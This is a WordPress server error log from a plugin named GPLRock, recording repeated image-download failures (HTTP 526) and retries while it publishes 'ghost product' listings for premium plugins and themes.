[05-Apr-2026 05:47:38 UTC] GPLRock: Image download failed for product woocommerce-elta-courier-voucher-label (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:40 UTC] GPLRock: Image download failed for product woocommerce-elta-courier-voucher-label (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-elta-courier-voucher--label-24657.webp for product woocommerce-elta-courier-voucher-label after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:42 UTC] GPLRock WARNING: Image download failed for product woocommerce-elta-courier-voucher-label. URL: https://meldwp.com/wp-content/uploads/woocommerce-elta-courier-voucher--label-24657.webp [05-Apr-2026 05:47:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-elta-courier-voucher-label [05-Apr-2026 05:47:42 UTC] GPLRock: Image download failed for product tshirt-virtual-try-on-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:44 UTC] GPLRock: Image download failed for product tshirt-virtual-try-on-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tshirt-virtual-try-on-plugin--woocommerce-wordpress-7984.webp for product tshirt-virtual-try-on-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:47 UTC] GPLRock: Image download failed for product tshirt-virtual-try-on-plugin-woocommerce-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:49 UTC] GPLRock: Image download failed for product tshirt-virtual-try-on-plugin-woocommerce-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/tshirt-virtual-try-on-plugin--woocommerce-wordpress-7984.webp for product tshirt-virtual-try-on-plugin-woocommerce-wordpress after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:51 UTC] GPLRock WARNING: Image download failed for product tshirt-virtual-try-on-plugin-woocommerce-wordpress. URL: https://meldwp.com/wp-content/uploads/tshirt-virtual-try-on-plugin--woocommerce-wordpress-7984.webp [05-Apr-2026 05:47:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: tshirt-virtual-try-on-plugin-woocommerce-wordpress [05-Apr-2026 05:47:51 UTC] GPLRock: Image download failed for product map-markers-multipurpose-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:53 UTC] GPLRock: Image download failed for product map-markers-multipurpose-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/map-markers---multipurpose-wordpress-plugin-11983.webp for product map-markers-multipurpose-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:55 UTC] GPLRock: Image download failed for product map-markers-multipurpose-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:57 UTC] GPLRock: Image download failed for product map-markers-multipurpose-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:47:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/map-markers---multipurpose-wordpress-plugin-11983.webp for product map-markers-multipurpose-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:47:59 UTC] GPLRock WARNING: Image download failed for product map-markers-multipurpose-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/map-markers---multipurpose-wordpress-plugin-11983.webp [05-Apr-2026 05:47:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: map-markers-multipurpose-wordpress-plugin [05-Apr-2026 05:47:59 UTC] GPLRock: Image download failed for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:02 UTC] GPLRock: Image download failed for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance-2810.webp for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:04 UTC] GPLRock: Image download failed for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:06 UTC] GPLRock: Image download failed for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance-2810.webp for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:08 UTC] GPLRock WARNING: Image download failed for product woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance. URL: https://meldwp.com/wp-content/uploads/woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance-2810.webp [05-Apr-2026 05:48:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-eu-cookie-consent-plugin-wordpress-gdpr-compliance [05-Apr-2026 05:48:08 UTC] GPLRock: Image download failed for product top-alert-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:10 UTC] GPLRock: Image download failed for product top-alert-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/top-alert-for-wpbakery-page-builder-24727.webp for product top-alert-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:12 UTC] GPLRock: Image download failed for product top-alert-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:14 UTC] GPLRock: Image download failed for product top-alert-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/top-alert-for-wpbakery-page-builder-24727.webp for product top-alert-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:17 UTC] GPLRock WARNING: Image download failed for product top-alert-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/top-alert-for-wpbakery-page-builder-24727.webp [05-Apr-2026 05:48:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: top-alert-for-wpbakery-page-builder [05-Apr-2026 05:48:17 UTC] GPLRock: Image download failed for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:19 UTC] GPLRock: Image download failed for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deprixa-basic--courier-freight-forwarding--shipping-software-solutions-v35-22657.webp for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:21 UTC] GPLRock: Image download failed for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:23 UTC] GPLRock: Image download failed for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:48:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/deprixa-basic--courier-freight-forwarding--shipping-software-solutions-v35-22657.webp for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:48:25 UTC] GPLRock WARNING: Image download failed for product deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35. URL: https://meldwp.com/wp-content/uploads/deprixa-basic--courier-freight-forwarding--shipping-software-solutions-v35-22657.webp [05-Apr-2026 05:48:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: deprixa-basic-courier-freight-forwarding-shipping-software-solutions-v35 [05-Apr-2026 05:49:14 UTC] GPLRock: Image downloaded successfully for product ecoife-charity-fundraising-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4296b09.webp [05-Apr-2026 05:49:14 UTC] GPLRock: Using pre-downloaded image for product ecoife-charity-fundraising-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4296b09.webp [05-Apr-2026 05:49:14 UTC] GPLRock: Ghost product published with image - Product ID: ecoife-charity-fundraising-elementor-template-kit [05-Apr-2026 05:49:15 UTC] GPLRock: Image downloaded successfully for product ecare-elderly-health-care-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9beb4922.webp [05-Apr-2026 05:49:15 UTC] GPLRock: Using pre-downloaded image for product ecare-elderly-health-care-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-9beb4922.webp [05-Apr-2026 05:49:15 UTC] GPLRock: Ghost product published with image - Product ID: ecare-elderly-health-care-elementor-template-kit [05-Apr-2026 05:49:16 UTC] GPLRock: Image downloaded successfully for product ebec-renovation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c9c198.webp [05-Apr-2026 05:49:16 UTC] GPLRock: Using pre-downloaded image for product ebec-renovation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78c9c198.webp [05-Apr-2026 05:49:16 UTC] GPLRock: Ghost product published with image - Product ID: ebec-renovation-elementor-template-kit [05-Apr-2026 05:49:17 UTC] GPLRock: Image downloaded successfully for product easychat-online-app-startup-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c659e4f6.webp [05-Apr-2026 05:49:18 UTC] GPLRock: Using pre-downloaded image for product easychat-online-app-startup-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c659e4f6.webp [05-Apr-2026 05:49:18 UTC] GPLRock: Ghost product published with image - Product ID: easychat-online-app-startup-elementor-template-kit [05-Apr-2026 05:49:19 UTC] GPLRock: Image downloaded successfully for product dustro-construction-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2dbfbe1.jpg [05-Apr-2026 05:49:19 UTC] GPLRock: Using pre-downloaded image for product dustro-construction-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d2dbfbe1.jpg [05-Apr-2026 05:49:19 UTC] GPLRock: Ghost product published with image - Product ID: dustro-construction-company-elementor-template-kit [05-Apr-2026 05:49:21 UTC] GPLRock: Image downloaded successfully for product dustri-factory-industrial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e6a6198.webp [05-Apr-2026 05:49:21 UTC] GPLRock: Using pre-downloaded image for product dustri-factory-industrial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2e6a6198.webp [05-Apr-2026 05:49:21 UTC] GPLRock: Ghost product published with image - Product ID: dustri-factory-industrial-elementor-template-kit [05-Apr-2026 05:49:22 UTC] GPLRock: Image downloaded successfully for product dunmedic-medical-healthcare-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec7e58ee.webp [05-Apr-2026 05:49:22 UTC] GPLRock: Using pre-downloaded image for product dunmedic-medical-healthcare-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec7e58ee.webp [05-Apr-2026 05:49:22 UTC] GPLRock: Ghost product published with image - Product ID: dunmedic-medical-healthcare-elementor-template-kit [05-Apr-2026 05:49:24 UTC] GPLRock: Image downloaded successfully for product duha-engineering-industrial-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-325b9ac6.webp [05-Apr-2026 05:49:24 UTC] GPLRock: Using pre-downloaded image for product duha-engineering-industrial-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-325b9ac6.webp [05-Apr-2026 05:49:24 UTC] GPLRock: Ghost product published with image - Product ID: duha-engineering-industrial-elementor-template-kit [05-Apr-2026 05:49:25 UTC] GPLRock: Image downloaded successfully for product dryze-dry-cleaning-laundry-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14603eca.jpg [05-Apr-2026 05:49:25 UTC] GPLRock: Using pre-downloaded image for product dryze-dry-cleaning-laundry-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-14603eca.jpg [05-Apr-2026 05:49:25 UTC] GPLRock: Ghost product published with image - Product ID: dryze-dry-cleaning-laundry-service-elementor-template-kit [05-Apr-2026 05:49:27 UTC] GPLRock: Image downloaded successfully for product drouge-cosmetic-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0eeaf0fb.webp [05-Apr-2026 05:49:27 UTC] GPLRock: Using pre-downloaded image for product drouge-cosmetic-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-0eeaf0fb.webp [05-Apr-2026 05:49:27 UTC] GPLRock: Ghost product published with image - Product ID: drouge-cosmetic-elementor-template-kit [05-Apr-2026 05:51:01 UTC] GPLRock: Image downloaded successfully for product booknetic-custom-forms-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bfa19ec4.webp [05-Apr-2026 05:51:01 UTC] GPLRock: Using pre-downloaded image for product booknetic-custom-forms-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bfa19ec4.webp [05-Apr-2026 05:51:01 UTC] GPLRock: Ghost product published with image - Product ID: booknetic-custom-forms-addon [05-Apr-2026 05:51:03 UTC] GPLRock: Image downloaded successfully for product quadmenu-themes-developer-mega-menu (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81435e58.jpg [05-Apr-2026 05:51:03 UTC] GPLRock: Using pre-downloaded image for product quadmenu-themes-developer-mega-menu: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-81435e58.jpg [05-Apr-2026 05:51:03 UTC] GPLRock: Ghost product published with image - Product ID: quadmenu-themes-developer-mega-menu [05-Apr-2026 05:51:04 UTC] GPLRock: Image downloaded successfully for product monsterinsights-page-insights-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57e1588e.jpg [05-Apr-2026 05:51:05 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-page-insights-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-57e1588e.jpg [05-Apr-2026 05:51:05 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-page-insights-addon [05-Apr-2026 05:51:06 UTC] GPLRock: Image downloaded successfully for product monsterinsights-media (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a909a5ea.jpg [05-Apr-2026 05:51:06 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-media: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a909a5ea.jpg [05-Apr-2026 05:51:06 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-media [05-Apr-2026 05:51:08 UTC] GPLRock: Image downloaded successfully for product monsterinsights-site-notes-important-events-addon (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e86edef.jpg [05-Apr-2026 05:51:08 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-site-notes-important-events-addon: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2e86edef.jpg [05-Apr-2026 05:51:08 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-site-notes-important-events-addon [05-Apr-2026 05:51:10 UTC] GPLRock: Image downloaded successfully for product monsterinsights-user-journey (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82f832aa.webp [05-Apr-2026 05:51:10 UTC] GPLRock: Using pre-downloaded image for product monsterinsights-user-journey: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-82f832aa.webp [05-Apr-2026 05:51:10 UTC] GPLRock: Ghost product published with image - Product ID: monsterinsights-user-journey [05-Apr-2026 05:51:11 UTC] GPLRock: Image downloaded successfully for product happy-files-pro-gpl (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5b80f61.jpg [05-Apr-2026 05:51:11 UTC] GPLRock: Using pre-downloaded image for product happy-files-pro-gpl: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b5b80f61.jpg [05-Apr-2026 05:51:11 UTC] GPLRock: Ghost product published with image - Product ID: happy-files-pro-gpl [05-Apr-2026 05:51:12 UTC] GPLRock: Image downloaded successfully for product advanced-themer-for-bricks (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67f77b5b.jpg [05-Apr-2026 05:51:12 UTC] GPLRock: Using pre-downloaded image for product advanced-themer-for-bricks: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-67f77b5b.jpg [05-Apr-2026 05:51:12 UTC] GPLRock: Ghost product published with image - Product ID: advanced-themer-for-bricks [05-Apr-2026 05:51:14 UTC] GPLRock: Image downloaded successfully for product wpc-variations-table-for-woocommerce-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b33eb20b.webp [05-Apr-2026 05:51:14 UTC] GPLRock: Using pre-downloaded image for product wpc-variations-table-for-woocommerce-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b33eb20b.webp [05-Apr-2026 05:51:14 UTC] GPLRock: Ghost product published with image - Product ID: wpc-variations-table-for-woocommerce-premium [05-Apr-2026 05:51:15 UTC] GPLRock: Image downloaded successfully for product workscout-job-board-freelance-marketplace-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f24c59e.avif [05-Apr-2026 05:51:15 UTC] GPLRock: Using pre-downloaded image for product workscout-job-board-freelance-marketplace-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f24c59e.avif [05-Apr-2026 05:51:15 UTC] GPLRock: Ghost product published with image - Product ID: workscout-job-board-freelance-marketplace-wordpress-theme [05-Apr-2026 05:53:49 UTC] GPLRock: Image download failed for product btourq-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:53:52 UTC] GPLRock: Image download failed for product btourq-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:53:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/btourq---wordpress-news-magazine-theme-28270.webp for product btourq-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:53:54 UTC] GPLRock: Image download failed for product btourq-wordpress-news-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:53:56 UTC] GPLRock: Image download failed for product btourq-wordpress-news-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:53:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/btourq---wordpress-news-magazine-theme-28270.webp for product btourq-wordpress-news-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:53:58 UTC] GPLRock WARNING: Image download failed for product btourq-wordpress-news-magazine-theme. URL: https://meldwp.com/wp-content/uploads/btourq---wordpress-news-magazine-theme-28270.webp [05-Apr-2026 05:53:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: btourq-wordpress-news-magazine-theme [05-Apr-2026 05:53:58 UTC] GPLRock: Image download failed for product coffo-cafe-coffee-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:54:00 UTC] GPLRock: Image download failed for product coffo-cafe-coffee-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:54:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coffo---cafe--coffee-shop-wordpress-theme-20405.webp for product coffo-cafe-coffee-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:54:02 UTC] GPLRock: Image download failed for product coffo-cafe-coffee-shop-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:54:05 UTC] GPLRock: Image download failed for product coffo-cafe-coffee-shop-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 05:54:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/coffo---cafe--coffee-shop-wordpress-theme-20405.webp for product coffo-cafe-coffee-shop-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 05:54:07 UTC] GPLRock WARNING: Image download failed for product coffo-cafe-coffee-shop-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/coffo---cafe--coffee-shop-wordpress-theme-20405.webp [05-Apr-2026 05:54:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: coffo-cafe-coffee-shop-wordpress-theme [05-Apr-2026 05:54:07 UTC] GPLRock: Image download failed for product delimondo-responsive-wordpress-theme-5-styles (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:10 UTC] GPLRock: Image downloaded successfully for product revija-blogmagazine-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-945aaf45.webp [05-Apr-2026 06:04:10 UTC] GPLRock: Using pre-downloaded image for product revija-blogmagazine-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-945aaf45.webp [05-Apr-2026 06:04:10 UTC] GPLRock: Ghost product published with image - Product ID: revija-blogmagazine-wordpress-theme [05-Apr-2026 06:04:10 UTC] GPLRock: Image download failed for product payday-loans-banking-loan-business-and-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:12 UTC] GPLRock: Image download failed for product payday-loans-banking-loan-business-and-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payday-loans---banking-loan-business-and-finance-wordpress-theme-3132.webp for product payday-loans-banking-loan-business-and-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:14 UTC] GPLRock: Image download failed for product payday-loans-banking-loan-business-and-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:16 UTC] GPLRock: Image download failed for product payday-loans-banking-loan-business-and-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/payday-loans---banking-loan-business-and-finance-wordpress-theme-3132.webp for product payday-loans-banking-loan-business-and-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:19 UTC] GPLRock WARNING: Image download failed for product payday-loans-banking-loan-business-and-finance-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/payday-loans---banking-loan-business-and-finance-wordpress-theme-3132.webp [05-Apr-2026 06:04:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: payday-loans-banking-loan-business-and-finance-wordpress-theme [05-Apr-2026 06:04:19 UTC] GPLRock: Image download failed for product glck-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:21 UTC] GPLRock: Image download failed for product glck-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glck---digital-agency-wordpress-theme-12075.webp for product glck-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:23 UTC] GPLRock: Image download failed for product glck-digital-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:25 UTC] GPLRock: Image download failed for product glck-digital-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glck---digital-agency-wordpress-theme-12075.webp for product glck-digital-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:27 UTC] GPLRock WARNING: Image download failed for product glck-digital-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glck---digital-agency-wordpress-theme-12075.webp [05-Apr-2026 06:04:27 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glck-digital-agency-wordpress-theme [05-Apr-2026 06:04:27 UTC] GPLRock: Image download failed for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:30 UTC] GPLRock: Image download failed for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camptree---outdoor-camping-equipment-woocommerce-elementor-theme-17170.webp for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:32 UTC] GPLRock: Image download failed for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:34 UTC] GPLRock: Image download failed for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/camptree---outdoor-camping-equipment-woocommerce-elementor-theme-17170.webp for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:36 UTC] GPLRock WARNING: Image download failed for product camptree-outdoor-camping-equipment-woocommerce-elementor-theme. URL: https://meldwp.com/wp-content/uploads/camptree---outdoor-camping-equipment-woocommerce-elementor-theme-17170.webp [05-Apr-2026 06:04:36 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: camptree-outdoor-camping-equipment-woocommerce-elementor-theme [05-Apr-2026 06:04:36 UTC] GPLRock: Image download failed for product argenta-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:38 UTC] GPLRock: Image download failed for product argenta-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argenta---creative-multipurpose-wordpress-theme-11655.webp for product argenta-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:41 UTC] GPLRock: Image download failed for product argenta-creative-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:43 UTC] GPLRock: Image download failed for product argenta-creative-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 06:04:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/argenta---creative-multipurpose-wordpress-theme-11655.webp for product argenta-creative-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 06:04:45 UTC] GPLRock WARNING: Image download failed for product argenta-creative-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/argenta---creative-multipurpose-wordpress-theme-11655.webp [05-Apr-2026 06:04:45 UTC] 